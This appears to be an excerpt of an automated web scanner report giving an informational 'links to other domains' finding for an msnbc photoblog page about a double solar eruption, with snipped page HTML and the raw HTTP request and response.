<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/8b751245ebdf90a2a023d6408b7a7907682211f2.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/da88e70e83817a8b3e0c3b7723071d44c87b04c0.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/photoblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=c5942494&amp;rand=930869644&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Fphotoblog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F5941280-mohamed-bouazizi-the-fruit-vendor-whose-death-may-have-changed-the-arab-world&amp;ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://photoblog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</span>A spectacular double eruption on the sun was captured today by NASA's <a target="_blank" href="http://sdo.gsfc.nasa.gov/">Solar Dynamics Observatory</a>. The eruptions happened nearly simultaneously on opposite sides of the solar disk, <a target="_blank" href="http://spaceweather.com/">SpaceWeather.com reported</a>
...[SNIP]...
<p><a target="_blank" href="http://www.byjohnroach.com/"><i>
...[SNIP]...
</i><a target="_blank" href="http://www.facebook.com/cosmiclog"><i>
...[SNIP]...
</i><a href="http://twitter.com/b0yle"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_pictures" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" data-Text="Double whammy on the sun">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MikeyMike.newsvine.com/">MikeyMike</a>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://DS-Houston.newsvine.com/">DS in Houston</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Ghost2516914.newsvine.com/">Ghost-2516914</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Eric2189088.newsvine.com/">Eric-2189088</a>
...[SNIP]...
<div class="normal"><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<a href="#star8" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://OscarPWalnuts.newsvine.com/">Oscar P Walnuts</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://whyajones.newsvine.com/">Cappy-1911</a>
...[SNIP]...
<div class="normal"><a href="http://jayphly1300264.newsvine.com/">jayphly-1300264</a>
...[SNIP]...
<div class="normal"><a href="http://patrick111.newsvine.com/">Patrick-1112710</a>
...[SNIP]...
<div class="normal"><a href="http://aanhonestsortnhonestsort-1436725.newsvine.com/">anhonestsort-1436725</a>
...[SNIP]...
<div class="normal"><a href="http://PhantomBeast.newsvine.com/">PhantomBeast</a>
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Roy-1813861.newsvine.com/">Roy-1813861</a>
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
<a href="#star9" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Nerakluvs.newsvine.com/">Nerakluvs</a>
...[SNIP]...
<div class="normal"><a href="http://phloeman.newsvine.com/">phloeman</a>
...[SNIP]...
<div class="normal"><a href="http://Cabernet2go.newsvine.com/">Ken Johnson-306874</a>
...[SNIP]...
<a href="#star10" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Sonflower.newsvine.com/">Sonflower</a>
...[SNIP]...
<div class="normal"><a href="http://wvbuild.newsvine.com/">wvbuild</a>
...[SNIP]...
<div class="normal"><a href="http://mdb123.newsvine.com/">MDB123</a>
...[SNIP]...
<div class="normal"><a href="http://Pandori.newsvine.com/">Pandori</a>
...[SNIP]...
<div class="normal"><a href="http://Attameus.newsvine.com/">Attameus</a>
...[SNIP]...
<div class="normal"><a href="http://IWonder2997692.newsvine.com/">I Wonder-2997692</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="normal"><a href="http://spiddas.newsvine.com/">Spiddas</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<a href="#star11" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://tracer58.newsvine.com/">tracer58</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://DumbJock.newsvine.com/">Dumb Jock</a>
...[SNIP]...
<div class="normal"><a href="http://hal90004.newsvine.com/">~HAL9000~</a>
...[SNIP]...
<div class="normal"><a href="http://TAMUK.newsvine.com/">TAMUK</a>
...[SNIP]...
<div class="normal"><a href="http://larbell.newsvine.com/">larbell</a>
...[SNIP]...
<div class="normal"><a href="http://paulhardy.newsvine.com/">orbust</a>
...[SNIP]...
<div class="normal"><a href="http://2srvHM.newsvine.com/">2srvHM</a>
...[SNIP]...
<div class="normal"><a href="http://fdpfg.newsvine.com/">fdpfg</a>
...[SNIP]...
<div class="normal"><a href="http://wire-bender.newsvine.com/">1NewDay</a>
...[SNIP]...
<div class="normal"><a href="http://wire-bender.newsvine.com/">1NewDay</a>
...[SNIP]...
<div class="normal"><a href="http://phloeman.newsvine.com/">phloeman</a>
...[SNIP]...
<div class="normal"><a href="http://mossdog420m.newsvine.com/">Megalodon-358694</a>
...[SNIP]...
<p><a href="http://attameus.newsvine.com/">Attameus</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://UnregisteredUser.newsvine.com/">Unregistered User</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://polanofp.newsvine.com/">An American!</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://phillyc1.newsvine.com/">PhillyC</a>
...[SNIP]...
<div class="normal"><a href="http://elven-bookworm.newsvine.com/">Elven Bookworm</a>
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
<a href="#star12" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MC2075922.newsvine.com/">MC-2075922</a>
...[SNIP]...
<a href="#star13" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Phoehammer.newsvine.com/">Phoehammer</a>
...[SNIP]...
<div class="normal"><a href="http://BillyBill.newsvine.com/">BillyBill</a>
...[SNIP]...
<div class="normal"><a href="http://scott-mckinsey.newsvine.com/">Mbones</a>
...[SNIP]...
<div class="normal"><a href="http://edwardduffy.newsvine.com/">Edward Duffy</a>
...[SNIP]...
<div class="normal"><a href="http://DaveO2998087.newsvine.com/">Dave-O-2998087</a>
...[SNIP]...
<div class="normal"><a href="http://danwill2.newsvine.com/">danwill</a>
...[SNIP]...
<div class="normal"><a href="http://Weralldoomed.newsvine.com/">Weralldoomed</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://robw1001.newsvine.com/">Robert Fleming</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jpfs52.newsvine.com/">jpfs52</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://senigallia.newsvine.com/">senigallia</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://garrettb1.newsvine.com/">GarrettB</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://jwp6868.newsvine.com/">Joe in NC</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://halowain.newsvine.com/">Hal Sherman</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="normal"><a href="http://jbunn.newsvine.com/">jbunn</a>
...[SNIP]...
<div class="normal"><a href="http://danwill2.newsvine.com/">danwill</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://mnstrm2.newsvine.com/">Art-981203</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ffeineandsugar.newsvine.com/">ffeineandsugar</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://sbphrog.newsvine.com/">SBPhrog</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://chibnikh.newsvine.com/">Herman C</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://steveorevo.newsvine.com/">S-480203</a>
...[SNIP]...
<div class="normal"><a href="http://Isthishumanity.newsvine.com/">Is this humanity</a>
...[SNIP]...
<div class="normal"><a href="http://snrekkcaj.newsvine.com/">Dissociate</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://rwh0829.newsvine.com/">riscifiguy</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MikeObama2313287.newsvine.com/">Mike Obama-2313287</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://votelover.newsvine.com/">votelover</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Brilli99.newsvine.com/">Brilli-99</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://glenbo02.newsvine.com/">glenbo</a>
...[SNIP]...
<div class="normal"><a href="http://josh1791701.newsvine.com/">Josh-1791701</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://RevitRay.newsvine.com/">Revit Ray</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mpp2029706.newsvine.com/">mpp-2029706</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://catastrophe3.newsvine.com/">cat(astrophe)</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star14" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://markscastle.newsvine.com/">MC-784701</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://DaughterofDaedalus.newsvine.com/">Daughter of Daedalus</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://john-roach.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.249. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun

Summary

Severity:   Information
Confidence:   Certain
Host:   http://photoblog.msnbc.redacted
Path:   /_news/2011/01/28/5942494-double-whammy-on-the-sun

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_news/2011/01/28/5942494-double-whammy-on-the-sun?gt1=43001 HTTP/1.1
Host: photoblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=270
Date: Sun, 30 Jan 2011 02:17:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 186064

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog - Double whammy
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://photoblog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
